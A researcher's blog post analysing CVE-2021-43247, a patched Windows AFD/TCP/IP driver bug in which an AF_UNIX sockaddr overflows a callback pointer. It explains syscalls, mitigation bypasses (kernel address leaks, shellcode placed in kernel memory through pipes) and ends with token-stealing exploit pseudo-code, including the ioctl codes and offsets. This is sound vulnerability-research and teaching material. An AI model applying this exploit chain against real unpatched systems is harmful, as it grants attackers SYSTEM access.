In this blog post I will go in depth into the inner workings of CVE-2021-43247
, which was fixed on the 14th of December 2021.
This bug was classified as “Windows TCP/IP Driver Elevation of Privilege Vulnerability”.
The vulnerability itself was probably dormant for a long time, but became exploitable when the AF_UNIX
address family
was first introduced in 2019.
I will also take this as an excuse to explain in detail, what drivers are, how user space communicates with drivers, what a Local Privilege Escalation (LPE) is and what how we can achieve it in this case.
The goal / what is an LPE (Local Privilege Escalation)
A Local Privilege Escalation (sometimes also called Elevation of Privilege or EoP) is an exploit which obtains some privilege that it is not supposed to be able to get. In the traditional cases (as in this one) this means we start out with at normal user shell and end up with administrator access. On Linux this would be about obtaining a root shell. This is usually done through a bug in a privileged process, a bug in a driver or a bug in the operating system itself.
As the CVE description tells us, we are dealing with a bug in the TCP/IP driver.
What are drivers and how does user space communicate with them?
Drivers are simply PE files , which the kernel loads into the kernel address space. PE (Portable Executable) is the executable file format used by Windows, it’s used by “.exe” and “.dll” files. Drivers usually have the file extension “.sys”, but there are also library drivers which also get the “.dll” file extension. Most drivers are contained in the “C:\windows\system32\drivers” directory. What drivers are loaded on system startup is determined by the registry and the physical devices available to the system.
User space can communicate with the loaded drivers using kernel system calls (or syscalls for short). For example, consider the program
// blog_socket.c - small example program used in this blog
#include <winsock.h>
int main() {
// Initialize WinSock
WSAStartup(MAKEWORD(2, 2), &(WSADATA){0});
// Create a TCP/IPv4 socket.
SOCKET Socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
// Bind the socket to any address
bind(Socket, &(struct sockaddr){AF_INET}, sizeof(struct sockaddr));
}
Then we can observe the following call stack:
00 ntdll!NtCreateFile
01 mswsock!SockSocket+0x56e
02 mswsock!WSPSocket+0x23a
03 WS2_32!WSASocketW+0x130
04 WS2_32!socket+0x6e
05 blog_socket!main+0x84
ntdll!NtCreateFile
is the function that actually transitions into the kernel address space.
The assembly for all ntdll!NtXxx
functions looks something like the following:
NtCreateFile:
mov r10, rcx ; load the first argument into r10, as the syscall
; instruction uses rcx as the return location
mov eax, 0x55 ; load the syscall value into eax (0x55 is 'NtCreateFile')
test byte ptr [.Running32Bit], 1 ; check if we are running a 32bit executable
jnz .Syscallx86
; syscall transitions into the kernel.
systcall
ret
.Syscallx86:
; x86 does not have a syscall instruction, use int 0x2e instead of syscall.
int 0x2e
ret
We will only focus on the x64 case here. The syscall instruction loads the new instruction pointer from a
specialized hardware registers (called a model specific register or MSR). Namely, the MSR IA32_LSTAR
.
It also stores the return
address (in this case the address of the ret
instruction) into rcx
and sets the privilege
level of the processor to 0. This is why kernel mode is sometimes referred to as ring 0.
When the processor is running at privilege level 0, it can access kernel space memory.
Here it is important to know that the address space does not change, but at non-zero privilege level the processor
faults when it is accessing a page which does not have the USER
bit set in the page table.
In Windows 10 the IA32_LSTAR
MSR points to the function nt!KiSystemCall64
, which first establishes a stack pointer:
KiSystemCall64:
swapgs ; load saved kernel thread locals from some MSR
mov gs:[gs.user_stack], rsp ; save user stack, in the kernel thread locals
mov rsp, gs:[gs.kernel_stack] ; load kernel space stack, from the thread locals
; ... from here we are just in kernel space, and can do whatever we want
; e.g. Save all the registers and then call the according NtXxx
; kernel function depending on eax.
The kernel then figures out what kernel function was requested by looking at eax
and transitions to it.
In this case we end up in nt!NtCreateFile
(on the kernel side).
00 nt!NtCreateFile <-- Kernel space function
01 nt!KiSystemServiceCopyEnd+0x25
02 ntdll!NtCreateFile+0x14 <-- User space function
03 mswsock!SockSocket+0x4ec
04 mswsock!WSPSocket+0x233
05 WS2_32!WSASocketW+0x1be
06 WS2_32!socket+0x9b
Note that the address space is still the same, as in user space. The difference being that we are now allowed
to access kernel memory. The arguments to nt!NtCreateFile
are unchanged from the arguments ntdll!NtCreateFile
received. The kernel very carefully validates all arguments and copies them safely to kernel space memory.
In this case “mswsock.dll” tries to open a HANDLE
to AFD or the “Ancillary Function Driver for WinSock”.
AFD
AFD is located at “C:\windows\system32\drivers\afd.sys” and provides implementations for the usual socket functions.
As I have hopefully been able to convince you the socket
function corresponds to opening a HANDLE
to AFD using NtCreateFile
.
Using the HANDLE
returned by NtCreateFile
, communication occurs via the NtDeviceIoControlFile
:
__kernel_entry NTSTATUS NtDeviceIoControlFile(
[in] HANDLE FileHandle,
[in] HANDLE Event,
[in] PIO_APC_ROUTINE ApcRoutine,
[in] PVOID ApcContext,
[out] PIO_STATUS_BLOCK IoStatusBlock,
[in] ULONG IoControlCode,
[in] PVOID InputBuffer,
[in] ULONG InputBufferLength,
[out] PVOID OutputBuffer,
[in] ULONG OutputBufferLength
);
Here, each different socket function corresponds to an IoControlCode
or ioctl for short.
For example, if we bind
the socket we end up in afd!AfdBind
00 afd!AfdBind
01 afd!AfdDispatchDeviceControl+0x7d
02 nt!IofCallDriver+0x59
03 nt!IopSynchronousServiceTail+0x1b1
04 nt!IopXxxControlFile+0xe0c
05 nt!NtDeviceIoControlFile+0x56
06 nt!KiSystemServiceCopyEnd+0x25
07 ntdll!NtDeviceIoControlFile+0x14
08 mswsock!WSPBind+0x278
09 WS2_32!bind+0xdf
0a blog_socket!main+0x137
Similarly, recv
corresponds to AfdReceive
, send
corresponds to AfdSend
and so on.
The arguments and return values of these functions are serialized into the InputBuffer
and OutputBuffer
, respectively.
The Bug
The bug combines three different features that Windows 10 provides. The TCP_FASTOPEN
option, the ConnectEx
/AfdSuperConnect
function and the AF_UNIX
address family.
TCP_FASTOPEN
Taken from Wikipedia
, the TCP_FASTOPEN
option allows the client under certain conditions to start sending data to the host without waiting for the ACK
packet. For us, what it does is not important, only that it is necessary to call AfdSuperConnect
later on.
AF_UNIX
As mentioned by this blog, the vulnerability probably turned exploitable when Windows started supporting
sockets of type AF_UNIX
.AF_UNIX
sockets provide a means of inter-process communication. For us the important fact is that the associated sockaddr
looks like this:
#define UNIX_PATH_MAX 108
typedef struct sockaddr_un
{
ADDRESS_FAMILY sun_family; /* AF_UNIX */
char sun_path[UNIX_PATH_MAX]; /* pathname */
} SOCKADDR_UN, *PSOCKADDR_UN;
And therefore, with a size of 110 = 0x6e
is quite large.
ConnectEx
The ConnectEx
function is a Microsoft specific extension
, which can be queried using WSAIoctl
.
The underlying kernel function is AfdSuperConnect
.
Sadly, the user space API validates the arguments to ConnectEx
and therefore we are forced to call it using NtDeviceIoControlFile
directly.
The socket functions do not expose the underlying handles to AFD. This forces us to use NtCreateFile
and NtDeviceIoControlFile
directly for all communication with AFD.
AfdSuperConnect
gets invoked when using NtDeviceIoControlFile
with the ioctl 0x120c7
.
The input buffer for this call consists of 10 bytes, most of which seem to be unused and then any sockaddr
.
The vulnerability occurs when AfdSuperConnect
attempts to connect to a sockaddr
of type AF_UNIX
.
The Setup
- Create an
AF_INET
socket usingNtCreateFile
. - Enable the
TCP_FASTOPEN
option usingAfdTliIoControl
(NtDeviceIoControlFile
with ioctl0x120bf
). - Bind the socket to any address using ioctl
AfdBind
(NtDeviceIoControlFile
with ioctl0x12003
). - Trigger the vulnerability by using
AfdSuperConnect
(NtDeviceIoControlFile
with ioctl0x120c7
) passing asockaddr
of typeAF_UNIX
.
As we opened the socket as an AF_INET
socket, the call to AfdSuperConnect
ends up in tcpip!TcpTlProviderConnectAndSend
.
00 tcpip!TcpTlProviderConnectAndSend
01 afd!AfdSuperConnect+0x10b26
02 afd!AfdDispatchDeviceControl+0x7d
03 nt!IofCallDriver+0x59
04 nt!IopSynchronousServiceTail+0x1b1
05 nt!IopXxxControlFile+0xe0c
06 nt!NtDeviceIoControlFile+0x56
tcpip!TcpCreateConnectTcb
checks early on whether the TCP_FASTOPEN
option is enabled and if it is not it returns with the error code STATUS_RETRY
.
If it is, it allocates a big internal structure and later on copies the sockaddr
we provided into the internal structure.
// Ghidra Decompilation from (tcpip!TcpCreateConnectTcb)
SockaddrFamily = *TlConnect->ConnectSockaddr;
if (SockaddrFamily < 0x23) {
sockaddr_size = (&::sockaddr_size)[SockaddrFamily];
}
/* this is where the magic happens */
memcpy(&_Dst->contains_the_function_pointer->sockaddr,
TlConnect->ConnectSockaddr, sockaddr_size);
Crucially, as this is all happening in “tcpip.sys”, the code only expects a sockaddr
of type AF_INET
or AF_INET6
which are of size 0x1c
and 0x24
, respectively.
Hence, tcpip only reserves 0x24
bytes of memory for said sockaddr
and we can overwrite 0x6e - 0x24
bytes after the size reserved for the sockaddr
.
Fortunately for us, this range of bytes contains a callback function pointer (originally pointing to afd!AfdTLBufferedSendComplete
) and its callback context argument.
Prior to the vulnerable memcpy
:
kd> dq rax + f8 L2
ffffac8e`6702a138 fffff806`2d0db540 ffffac8e`6841c9e0
kd> ln fffff806`2d0db540
(fffff806`2d0db540) afd!AfdTLBufferedSendComplete
After the vulnerable memcpy
:
kd> dq ffffac8e`6702a138 L2
ffffac8e`6702a138 13371337`13371337 deaddead`deaddead
The call to tcpip!TcpTlProviderConnectAndSend
eventually fails, returning a status code of STATUS_INVALID_ADDRESS_COMPONENT
,
but not before trying to “complete” the request, by calling the callback function pointer, passing its callback context as the first argument.
Breakpoint 3 hit
tcpip!guard_dispatch_icall_nop:
fffff803`11e36490 ffe0 jmp rax
kd> r rax, rcx
rax=1337133713371337 rcx=deaddeaddeaddead
kd> k
# Child-SP RetAddr Call Site
00 ffffeb0f`32dc18e8 fffff803`11d767fd tcpip!guard_dispatch_icall_nop
01 ffffeb0f`32dc18f0 fffff803`11d73840 tcpip!TcpCreateAndConnectTcbComplete+0xc39
02 ffffeb0f`32dc1b30 fffff803`11d88e2a tcpip!TcpShutdownTcb+0x1040
03 ffffeb0f`32dc1f20 fffff803`11d88d38 tcpip!TcpCreateAndConnectTcbInspectConnectComplete+0xba
04 ffffeb0f`32dc2000 fffff803`11d87be8 tcpip!TcpContinueCreateAndConnect+0x1044
05 ffffeb0f`32dc2220 fffff803`11d87998 tcpip!TcpCreateAndConnectTcbInspectConnectRequestComplete+0x118
06 ffffeb0f`32dc2330 fffff803`11d8709d tcpip!TcpCreateAndConnectTcbWorkQueueRoutine+0x8a8
07 ffffeb0f`32dc2450 fffff803`11ea2247 tcpip!TcpCreateAndConnectTcb+0xcb5
08 ffffeb0f`32dc25d0 fffff803`11995606 tcpip!TcpTlProviderConnectAndSend+0x17
09 ffffeb0f`32dc2600 fffff803`1198958d afd!AfdSuperConnect+0x10b26
Exploitability, Mitigations and Complications
As we have seen, the vulnerability gives us full control of the instruction pointer rip
and the first argument rcx
, and does so by calling into a function pointer we can freely choose.
A vulnerability this good is almost always exploitable. But we first have to jump through some loops…
SMEP (Supervisor Mode Execution Prevention)
The simplest idea to exploit a bug of this kind would be to set the instruction pointer to a user space address,
i.e write some shellcode that when executed in kernel mode will elevate permissions of the current process.
Sadly, Intel thought of this long ago and introduced SMEP.
SMEP uses the fact that user-pages have the USER
flag set in the page tables to throw an exception
when the kernel executes any user address.
ASLR (Address Space Layout Randomization)
Okay, so just executing user space code is out of the question, but what if we first load our shellcode into the kernel? First of, though it sounds hard, it is actually really easy to allocate arbitrary rwx-memory into kernel space using pipes:
char rwx_memory [0x100] = { <my_shellcode> }; // cannot contain zeroes
HANDLE read_pipe;
HANDLE write_pipe;
CreatePipe (&read_pipe, &write_pipe, NULL, NULL);
// ends up in 'NpSetAttribute'
NtFsControlFile(write_pipe, NULL, NULL, NULL, &status, 0x11003C,
rwx_memory, sizeof(rwx_memory), output, sizeof(output));
But as far as I know, there is no way for us to know where this allocation will end up (without another exploit or administrator privileges which would defeat the purpose). Even if we could control the heap perfectly we do not know where the heap starts. This is because of ASLR (Address Space Layout Randomization). At system startup, Windows randomizes all addresses it will use during runtime.
So…? Can we somehow get or leak addresses (or pointers) from the kernel? Fortunately, Windows is very nice to us in this respect.
There is a user space function called NtQuerySystemInformation
, which can be used to retrieve a lot of different kinds of information depending on an InformationClass
.
The InformationClass
we are interested in is SystemModuleInformation
. Using it, we can obtain the loaded base address of every currently running driver on the system,
including the kernel (ntoskrnl.exe) itself.
By parsing the images contained on disk and using these base addresses, we know the address of every exported kernel function. One could go one step further and look at all symbols using the public symbols (.pdb) provided by Microsoft, but for our purposes restricting the search to exported functions was enough.
CFG (Control Flow Guards)
Okay, the plan is to call exported kernel functions, but there (potentially) is one more obstacle in our way the CFG (Control Flow Guard) mitigation.
I did not emphasize this above, but looking at the call stack to the vulnerable call we can see that we are inside of a function called guard_dispatch_icall_nop
.
This means that control flow guards are disabled. If they were enabled we would instead be inside nt!guard_dispatch_icall
.
nt!guard_dispatch_icall
checks whether the address we are jumping to is registered as a CFG target. If the target is not registered, nt!guard_dispatch_icall
crashes the system (mitigating the exploit).
This registration happens when the driver is loaded. The binary contains information on which functions are valid CFG targets.
You can also view the CFG information using dumpbin:
> dumpbin /loadconfig C:\windows\system32\ntoskrnl.exe
Microsoft (R) COFF/PE Dumper Version 14.28.29336.0
Copyright (C) Microsoft Corporation. All rights reserved.
Dump of file C:\windows\system32\ntoskrnl.exe
File Type: EXECUTABLE IMAGE
Section contains the following load config:
<...>
Guard CF Function Table
Address
--------
0000000140200010
E 0000000140200050
00000001402000B0
00000001402001A0
E 0000000140200580
E 0000000140200940
E 00000001402009F0
0000000140200C40
00000001402010B0
00000001402010E0
0000000140201200
E 0000000140201750
E 0000000140201770
.
.
.
Therefore, if the exploit is supposed to work even if CFG is enabled, we need to chose our target function as a valid CFG target.
IRQL (Interrupt Request Level)
One last detail that bears mentioning, is the Interrupt Request Level (IRQL). The interrupt Request level is a hardware feature that allows threads to specify what interrupts they are willing to accept. Importantly, if the IRQL is at >= 2 the thread is not allowed to page-fault anymore. This means that when the IRQL is at least two, the thread cannot access pageable memory anymore.
Pageable memory is memory that the Windows kernel reserves the right to spill to disk, if the system is running low on memory. If a thread would then access that memory a pagefault would occur and the Windows kernel would reload the page from disk.
Why is all this important? Well, it just so happens that the function we are overwriting is a “Completion Routine”. Completion Routines are supposed to run at IRQL = 2 and therefore might crash the system whenever they are accessing paged memory. All user space memory is paged and thus the exploit might crash when accessing user space memory. Further, not all kernel space functions are non-paged (though most are), further restricting the set of functions we can use in the exploit.
In reality, we are only interested in providing a proof of concept, so one could just ignore the the fact that the exploit crashes sometimes, but we actually have a solution:
Sometimes, when the kernel uses a piece of user space memory, it uses so called Memory Descriptor Lists (MDL) . When such a list is “locked”, the kernel will never page out the memory. Therefore, we just have to make some request, that will “lock” an MDL for the user space memory we are using and then we can reliably use it at IRQL = 2.
Primitives
So, we have control over rip
and rcx
and can call some exported kernel functions, but what is the plan?
Roughly, we want to obtain exploit primitives which allow us to read and write kernel memory:
u64 read_u64(u64 kernel_address);
void write_u64(u64 kernel_address, u64 value);
These will later be used to give our process administrator privileges using a generalized exploit algorithm.
We construct these primitives by using the vulnerability with an exported kernel function. The perfect kernel function for a read primitive would look something like this:
void read_function(struct read_argument *read){
read->value = read->pointer->value;
}
And the perfect write function would look something like this:
void write_function(struct write_argument *write){
*write->pointer = write->value;
}
Here the read/write argument would be a pointer to user space memory. This means we have full control of the value of read->pointer
and write->pointer
, respectively.
These pointers then get dereferenced and either written to the controlled write->value
or read and stored back into user space memory.
If one cannot find primitives as perfect as these, one can search for functions that spread the first argument. The perfect spread function would be something like:
void spread_function(struct arguments *arguments){
(*arguments->function)(arguments->argument_1, arguments->argument_2,
arguments->argument_3, arguments->argument_4);
}
Using the perfect spread function one could obtain a read/write function as follows:
void read_write_function_called_by_spread_function(
struct argument_1 *arg_1, struct argument_2 *arg_2){
arg_1->value = arg_2->value;
}
In practice, we used two spread functions and then different read and write functions.
Windows Exploitation tricks and the general exploit algorithm
The exploitation algorithm we are using is called “Token Stealing”. You can find a lot of information on it online. But we will give a short overview.
Every process has an internal _EPROCESS
kernel structure. The access rights of the process are contained in an internal kernel structure called _TOKEN
.
The _EPROCESS
structure references this token, by pointer.
kd> dt nt!_EPROCESS Token
+0x358 Token : _EX_FAST_REF
kd> nt!_EX_FAST_REF
+0x000 Object : Ptr64 Void
+0x000 RefCnt : Pos 0, 4 Bits
+0x000 Value : Uint8B
Now, if we control the _TOKEN
, we have control of all access rights.
One option would be to use the read and write primitive to directly alter the access token, but in this case there is a simpler way.
If we can locate a process which has SYSTEM
access rights, we can simply copy the _TOKEN
-pointer of the SYSTEM
process into the _EPROCESS->Token
of our process.
And it just so happens that the kernel exports a pointer to the nt!PsInitialSystemProcess
which has SYSTEM
access rights.
Therefore, the basic algorithm would be
- Use the read primitive to read the value of
(nt!PsInitialSystemProcess)->Token
- Use the write primitive to write the value to our
_EPROCESS->Token
field.
But 2 problems remain:
- As the
_EPROCESS
structure is undocumented and subject to change, the offset of theToken
field varies by kernel version. - We do not know where our
_EPROCESS
structure is.
This is where Windows is really helpful again. Just as we can find all base addresses of kernel modules using NtQuerySystemInformation(SystemModuleInformation)
,
we can find the address of both our _EPROCESS
structure (solving 2) and our _TOKEN
structure using NtQuerySystemInformation(SystemHandleInformation)
.
Now, using the read primitive, we can iterate through our _EPROCESS
structure and locate the _TOKEN
structure.
This then gives us the offset of the Token
field.
Putting it all together in pseudo-code, it looks something like this:
// Use the Windows API to get all the information we want.
token, process := find_token_and_process_using_NtQuerySystemInformation();
PsInitialSystemProcess_export, read_function, write_function :=
find_exported_symbols_using_NtQuerySystemInformation();
// Use a system call that is more or less equivalent to
// `socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)`
socket_handle := NtCreateFile("\\Device\\Afd", EaBuffer = {AF_INET, SOCK_STREAM, IPPROTO_TCP});
// use the system call that is equivalent to
// `setsockopt(socket, IPPROTO_TCP, TCP_FASTOPEN, &(u32){1}, 1)`
NtDeviceIoControlFile(socket_handle, 0x120bf, .input_buffer = {SetSockOpt, .level = IPPROTO_TCP, .option = TCP_FASTOPEN, .optval = &(u32){1}, .optlen = 1});
// use the system call that is equivalent to
// `bind(socket, &(struct sockaddr){AF_INET}, sizeof(struct sockaddr))`
NtDeviceIoControlFile(socket_handle, 0x12003, ...);
// The read and write primitives now work by triggering the vulnerability by calling
// `AfdSuperConnect` through the `NtDeviceIoControlFile`.
function u64 read_u64(u64 address):
read_argument := {.pointer = address};
NtDeviceIoControlFile(socket_handle, 0x120c7, .input_buffer = {.sockaddr = {AF_INET, .offset_0x5c = read_function, .offset_0x64 = &read_argument}});
return read_argument.value;
function void write_u64(u64 address, u64 value):
write_argument := {.pointer = address, .value = value};
NtDeviceIoControlFile(socket_handle, 0x120c7, .input_buffer = {.sockaddr = {AF_INET, .offset_0x5c = write_function, .offset_0x64 = &write_argument}});
// figure out the token_offset, by linearly scanning through our `_EPROCESS`
for i from 0 to 0x1000:
maybe_token := read_u64(process + i * 8);
if maybe_token == token:
token_offset = i * 8;
break;
// figure out the `_TOKEN` of `nt!PsInitialSystemProcess`
PsInitialSystemProcess = read_u64(PsInitialSystemProcess_export);
PsInitialSystemProcessToken = read_u64(PsInitialSystemProcess + token_offset);
// actually steal the access `_TOKEN` to give us complete access rights.
write_u64(token + token_offset, PsInitialSystemProcessToken);
// spawn a shell to keep the access rights in a clean way.
spawn_shell();